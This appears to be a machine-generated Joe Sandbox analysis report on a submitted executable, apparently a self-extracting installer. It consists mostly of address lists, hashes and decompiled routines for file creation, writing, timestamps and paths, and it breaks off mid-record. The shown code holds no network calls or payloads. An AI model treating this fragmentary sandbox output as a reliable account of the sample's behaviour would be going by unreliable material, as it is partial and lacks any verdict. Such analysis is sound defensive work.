                                                                                                                                                                                                        0x00e84e88
                                                                                                                                                                                                        0x00e84e98
                                                                                                                                                                                                        0x00e84e98
                                                                                                                                                                                                        0x00e84d17
                                                                                                                                                                                                        0x00e84d17
                                                                                                                                                                                                        0x00e84d1a
                                                                                                                                                                                                        0x00e84d2f
                                                                                                                                                                                                        0x00e84d2f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84d2f
                                                                                                                                                                                                        0x00e84d1c
                                                                                                                                                                                                        0x00e84d1c
                                                                                                                                                                                                        0x00e84d1f
                                                                                                                                                                                                        0x00e84dcb
                                                                                                                                                                                                        0x00e84dd0
                                                                                                                                                                                                        0x00e84dd2
                                                                                                                                                                                                        0x00e84ddd
                                                                                                                                                                                                        0x00e84ddd
                                                                                                                                                                                                        0x00e84de3
                                                                                                                                                                                                        0x00e84de8
                                                                                                                                                                                                        0x00e84ded
                                                                                                                                                                                                        0x00e84ded
                                                                                                                                                                                                        0x00e84def
                                                                                                                                                                                                        0x00e84df0
                                                                                                                                                                                                        0x00e84df0
                                                                                                                                                                                                        0x00e84df4
                                                                                                                                                                                                        0x00e84df4
                                                                                                                                                                                                        0x00e84df6
                                                                                                                                                                                                        0x00e84df9
                                                                                                                                                                                                        0x00e84dfc
                                                                                                                                                                                                        0x00e84dfc
                                                                                                                                                                                                        0x00e84dfe
                                                                                                                                                                                                        0x00e84dff
                                                                                                                                                                                                        0x00e84dff
                                                                                                                                                                                                        0x00e84e03
                                                                                                                                                                                                        0x00e84e08
                                                                                                                                                                                                        0x00e84e0a
                                                                                                                                                                                                        0x00e84e0f
                                                                                                                                                                                                        0x00e84d03
                                                                                                                                                                                                        0x00e84d03
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84d03
                                                                                                                                                                                                        0x00e84e18
                                                                                                                                                                                                        0x00e84e20
                                                                                                                                                                                                        0x00e84e25
                                                                                                                                                                                                        0x00e84e27
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84e33
                                                                                                                                                                                                        0x00e84e38
                                                                                                                                                                                                        0x00e84e3a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84e40
                                                                                                                                                                                                        0x00e84e51
                                                                                                                                                                                                        0x00e84e56
                                                                                                                                                                                                        0x00e84e5b
                                                                                                                                                                                                        0x00e84e5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84e6a
                                                                                                                                                                                                        0x00e84e6f
                                                                                                                                                                                                        0x00e84e71
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84e77
                                                                                                                                                                                                        0x00e84e7d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84e7d
                                                                                                                                                                                                        0x00e84d25
                                                                                                                                                                                                        0x00e84d25
                                                                                                                                                                                                        0x00e84d28
                                                                                                                                                                                                        0x00e84d36
                                                                                                                                                                                                        0x00e84d3b
                                                                                                                                                                                                        0x00e84d40
                                                                                                                                                                                                        0x00e84d40
                                                                                                                                                                                                        0x00e84d42
                                                                                                                                                                                                        0x00e84d43
                                                                                                                                                                                                        0x00e84d43
                                                                                                                                                                                                        0x00e84d47
                                                                                                                                                                                                        0x00e84d4a
                                                                                                                                                                                                        0x00e84d4a
                                                                                                                                                                                                        0x00e84d4c
                                                                                                                                                                                                        0x00e84d4f
                                                                                                                                                                                                        0x00e84d4f
                                                                                                                                                                                                        0x00e84d51
                                                                                                                                                                                                        0x00e84d52
                                                                                                                                                                                                        0x00e84d52
                                                                                                                                                                                                        0x00e84d56
                                                                                                                                                                                                        0x00e84d5b
                                                                                                                                                                                                        0x00e84d5d
                                                                                                                                                                                                        0x00e84d62
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84d67
                                                                                                                                                                                                        0x00e84d6f
                                                                                                                                                                                                        0x00e84d74
                                                                                                                                                                                                        0x00e84d76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84d7c
                                                                                                                                                                                                        0x00e84d84
                                                                                                                                                                                                        0x00e84d89
                                                                                                                                                                                                        0x00e84d8b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84d94
                                                                                                                                                                                                        0x00e84d99
                                                                                                                                                                                                        0x00e84d9e
                                                                                                                                                                                                        0x00e84da1
                                                                                                                                                                                                        0x00e84daa
                                                                                                                                                                                                        0x00e84daa
                                                                                                                                                                                                        0x00e84da3
                                                                                                                                                                                                        0x00e84da3
                                                                                                                                                                                                        0x00e84da3
                                                                                                                                                                                                        0x00e84db5
                                                                                                                                                                                                        0x00e84dbb
                                                                                                                                                                                                        0x00e84dbd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84dc3
                                                                                                                                                                                                        0x00e84dc5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84dc5
                                                                                                                                                                                                        0x00e84dbd
                                                                                                                                                                                                        0x00e84d2a
                                                                                                                                                                                                        0x00e84d2a
                                                                                                                                                                                                        0x00e84d2d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84d2d
                                                                                                                                                                                                        0x00e84cf8
                                                                                                                                                                                                        0x00e84cfd
                                                                                                                                                                                                        0x00e84d02
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00E84DB5
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00E84DDD
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFileItemText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                        • API String ID: 3625706803-305352358
                                                                                                                                                                                                        • Opcode ID: b6a13d76fd710f552a92700cbdccd8d744cf8ddf19ca9310dc73f7916547004d
                                                                                                                                                                                                        • Instruction ID: e37dc935361c72719632515446fd1904ab36ac4776c71cf9c7f0de7a0fa526e8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6a13d76fd710f552a92700cbdccd8d744cf8ddf19ca9310dc73f7916547004d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE4135B62045038BCB22BF38DD446F573A5EB45308F085A6AD88EB72C5DA32DE4AC750
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E84C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                        				struct _FILETIME _v12;
                                                                                                                                                                                                        				struct _FILETIME _v20;
                                                                                                                                                                                                        				FILETIME* _t14;
                                                                                                                                                                                                        				int _t15;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t21 = __ecx * 0x18;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t21 + 0xe88d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t14 =  &_v12;
                                                                                                                                                                                                        					_t15 = SetFileTime( *(_t21 + 0xe88d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        0x00e84c40
                                                                                                                                                                                                        0x00e84c4a
                                                                                                                                                                                                        0x00e84c8d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84c70
                                                                                                                                                                                                        0x00e84c70
                                                                                                                                                                                                        0x00e84c7e
                                                                                                                                                                                                        0x00e84c86
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84c8a

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00E84C54
                                                                                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E84C66
                                                                                                                                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00E84C7E
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Time$File$DateLocal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2071732420-0
                                                                                                                                                                                                        • Opcode ID: 757da2749d9e5521bd3b5ec04192924a9d4fabf0c2b918b10ba4a8c605e40b17
                                                                                                                                                                                                        • Instruction ID: 5c2456a18d50008f28619daf086f869c97398618408e784d2cb6e529f45e2dc9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 757da2749d9e5521bd3b5ec04192924a9d4fabf0c2b918b10ba4a8c605e40b17
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2F096B250110D6FAB14EFB5CD48DBBB7ADEB04244744053BB81DF1090EA30D914D7A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00E8487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                        				CHAR* _t11;
                                                                                                                                                                                                        				long _t18;
                                                                                                                                                                                                        				long _t23;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t11 = __ecx;
                                                                                                                                                                                                        				asm("sbb edi, edi");
                                                                                                                                                                                                        				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                        				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                        					asm("sbb esi, esi");
                                                                                                                                                                                                        					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                        						asm("sbb esi, esi");
                                                                                                                                                                                                        						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t23 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                        				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                        					return _t7;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00E8490C(_t11);
                                                                                                                                                                                                        					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        0x00e84880
                                                                                                                                                                                                        0x00e8488c
                                                                                                                                                                                                        0x00e84894
                                                                                                                                                                                                        0x00e848a0
                                                                                                                                                                                                        0x00e848c9
                                                                                                                                                                                                        0x00e848ce
                                                                                                                                                                                                        0x00e848a2
                                                                                                                                                                                                        0x00e848a8
                                                                                                                                                                                                        0x00e848b7
                                                                                                                                                                                                        0x00e848bc
                                                                                                                                                                                                        0x00e848aa
                                                                                                                                                                                                        0x00e848ac
                                                                                                                                                                                                        0x00e848ac
                                                                                                                                                                                                        0x00e848a8
                                                                                                                                                                                                        0x00e848de
                                                                                                                                                                                                        0x00e848e7
                                                                                                                                                                                                        0x00e8490b
                                                                                                                                                                                                        0x00e848ee
                                                                                                                                                                                                        0x00e848f0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84902

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00E84A23,?,00E84F67,*MEMCAB,00008000,00000180), ref: 00E848DE
                                                                                                                                                                                                        • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00E84F67,*MEMCAB,00008000,00000180), ref: 00E84902
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                        • Opcode ID: e89afa12260dab032934c7d6dd600ce209bf9f61a719dfb3315b3afdb91cd776
                                                                                                                                                                                                        • Instruction ID: 35989e918d0051ab1cc7966cd6476f340d87376d0a0e1aae55e73381aca94c99
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e89afa12260dab032934c7d6dd600ce209bf9f61a719dfb3315b3afdb91cd776
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D0128E3E126712AF22960294C88FB7555CCBD6634F1B1235FDAEB71D1D5644C0483E0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00E84AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				int _t12;
                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				struct HWND__* _t21;
                                                                                                                                                                                                        				signed int _t24;
                                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 =  *0xe8858c; // 0x270
                                                                                                                                                                                                        				_t9 = E00E83680(_t20);
                                                                                                                                                                                                        				if( *0xe891d8 == 0) {
                                                                                                                                                                                                        					_push(_t24);
                                                                                                                                                                                                        					_t12 = WriteFile( *(0xe88d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						_t25 = _a12;
                                                                                                                                                                                                        						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        							_t14 =  *0xe89400; // 0x11b8f8
                                                                                                                                                                                                        							_t15 = _t14 + _t25;
                                                                                                                                                                                                        							 *0xe89400 = _t15;
                                                                                                                                                                                                        							if( *0xe88184 != 0) {
                                                                                                                                                                                                        								_t21 =  *0xe88584; // 0x0
                                                                                                                                                                                                        								if(_t21 != 0) {
                                                                                                                                                                                                        									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xe893f8, 0);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t25;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return _t9 | 0xffffffff;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        0x00e84ad5
                                                                                                                                                                                                        0x00e84adb
                                                                                                                                                                                                        0x00e84ae7
                                                                                                                                                                                                        0x00e84aee
                                                                                                                                                                                                        0x00e84b05
                                                                                                                                                                                                        0x00e84b0d
                                                                                                                                                                                                        0x00e84b14
                                                                                                                                                                                                        0x00e84b1a
                                                                                                                                                                                                        0x00e84b1c
                                                                                                                                                                                                        0x00e84b21
                                                                                                                                                                                                        0x00e84b2a
                                                                                                                                                                                                        0x00e84b2f
                                                                                                                                                                                                        0x00e84b31
                                                                                                                                                                                                        0x00e84b39
                                                                                                                                                                                                        0x00e84b54
                                                                                                                                                                                                        0x00e84b54
                                                                                                                                                                                                        0x00e84b39
                                                                                                                                                                                                        0x00e84b2f
                                                                                                                                                                                                        0x00e84b0f
                                                                                                                                                                                                        0x00e84b0f
                                                                                                                                                                                                        0x00e84b0f
                                                                                                                                                                                                        0x00e84b5e
                                                                                                                                                                                                        0x00e84ae9
                                                                                                                                                                                                        0x00e84aed
                                                                                                                                                                                                        0x00e84aed

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00E83680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00E8369F
                                                                                                                                                                                                          • Part of subcall function 00E83680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00E836B2
                                                                                                                                                                                                          • Part of subcall function 00E83680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00E836DA
                                                                                                                                                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00E84B05
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1084409-0
                                                                                                                                                                                                        • Opcode ID: 782ea328bf396a54249601f8a156254720971453f5d5c1bd47eef12c6fc45b88
                                                                                                                                                                                                        • Instruction ID: e0bc3998a18370b560b3b7e8300a61050c9d4708af10c7cb5880518c3665956e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 782ea328bf396a54249601f8a156254720971453f5d5c1bd47eef12c6fc45b88
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B01CC71640202AFDB14AFAAEC45BA27758EB44729F098225F93DBB1E1CB30C815CB80
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E8658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                        				intOrPtr _t4;
                                                                                                                                                                                                        				char* _t6;
                                                                                                                                                                                                        				char* _t8;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				char* _t16;
                                                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                        				char* _t19;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t16 = __ecx;
                                                                                                                                                                                                        				_t10 = __edx;
                                                                                                                                                                                                        				_t17 = __ecx;
                                                                                                                                                                                                        				_t1 = _t17 + 1; // 0xe88b3f
                                                                                                                                                                                                        				_t12 = _t1;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t4 =  *_t17;
                                                                                                                                                                                                        					_t17 = _t17 + 1;
                                                                                                                                                                                                        				} while (_t4 != 0);
                                                                                                                                                                                                        				_t18 = _t17 - _t12;
                                                                                                                                                                                                        				_t2 = _t18 + 1; // 0xe88b40
                                                                                                                                                                                                        				if(_t2 < __edx) {
                                                                                                                                                                                                        					_t19 = _t18 + __ecx;
                                                                                                                                                                                                        					if(_t19 > __ecx) {
                                                                                                                                                                                                        						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                        						if( *_t8 != 0x5c) {
                                                                                                                                                                                                        							 *_t19 = 0x5c;
                                                                                                                                                                                                        							_t19 =  &(_t19[1]);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t6 = _a4;
                                                                                                                                                                                                        					 *_t19 = 0;
                                                                                                                                                                                                        					while( *_t6 == 0x20) {
                                                                                                                                                                                                        						_t6 = _t6 + 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return E00E816B3(_t16, _t10, _t6);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0x8007007a;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        0x00e86592
                                                                                                                                                                                                        0x00e86594
                                                                                                                                                                                                        0x00e86596
                                                                                                                                                                                                        0x00e86598
                                                                                                                                                                                                        0x00e86598
                                                                                                                                                                                                        0x00e8659b
                                                                                                                                                                                                        0x00e8659b
                                                                                                                                                                                                        0x00e8659d
                                                                                                                                                                                                        0x00e8659e
                                                                                                                                                                                                        0x00e865a2
                                                                                                                                                                                                        0x00e865a4
                                                                                                                                                                                                        0x00e865a9
                                                                                                                                                                                                        0x00e865b2
                                                                                                                                                                                                        0x00e865b6
                                                                                                                                                                                                        0x00e865ba
                                                                                                                                                                                                        0x00e865c3
                                                                                                                                                                                                        0x00e865c5
                                                                                                                                                                                                        0x00e865c8
                                                                                                                                                                                                        0x00e865c8
                                                                                                                                                                                                        0x00e865c3
                                                                                                                                                                                                        0x00e865c9
                                                                                                                                                                                                        0x00e865cc
                                                                                                                                                                                                        0x00e865d2
                                                                                                                                                                                                        0x00e865d1
                                                                                                                                                                                                        0x00e865d1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e865dc
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(00E88B3E,00E88B3F,00000001,00E88B3E,-00000003,?,00E860EC,00E81140,?), ref: 00E865BA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharPrev
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 122130370-0
                                                                                                                                                                                                        • Opcode ID: dc62bc3da85b0fc8e30e624b0325006d71f0ee0d532e78633c3a3277d845b695
                                                                                                                                                                                                        • Instruction ID: b7e58339c92858ada053d34f763cca05c1d80d4403845e33a3e45ebbdb4de6e5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc62bc3da85b0fc8e30e624b0325006d71f0ee0d532e78633c3a3277d845b695
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3F04C321042509FD3322B1D9884BA6BFDEDB86350F28196EE8DEE3245DA658C4683A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00E8621E() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t5 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        					0x4f0 = 2;
                                                                                                                                                                                                        					_t9 = E00E8597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00E844B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                        					 *0xe89124 = E00E86285();
                                                                                                                                                                                                        					_t9 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        0x00e86229
                                                                                                                                                                                                        0x00e86230
                                                                                                                                                                                                        0x00e86247
                                                                                                                                                                                                        0x00e8626a
                                                                                                                                                                                                        0x00e86272
                                                                                                                                                                                                        0x00e86249
                                                                                                                                                                                                        0x00e86255
                                                                                                                                                                                                        0x00e8625f
                                                                                                                                                                                                        0x00e86264
                                                                                                                                                                                                        0x00e86264
                                                                                                                                                                                                        0x00e86284

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00E8623F
                                                                                                                                                                                                          • Part of subcall function 00E844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E84518
                                                                                                                                                                                                          • Part of subcall function 00E844B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E84554
                                                                                                                                                                                                          • Part of subcall function 00E86285: GetLastError.KERNEL32(00E85BBC), ref: 00E86285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 381621628-0
                                                                                                                                                                                                        • Opcode ID: 362e7c564f70337166971d42632659c078195233edc7b51f5b79e199079f8181
                                                                                                                                                                                                        • Instruction ID: 6a59c59533643d79194664db75831b87e330dde849755de8fb46e12eb143317f
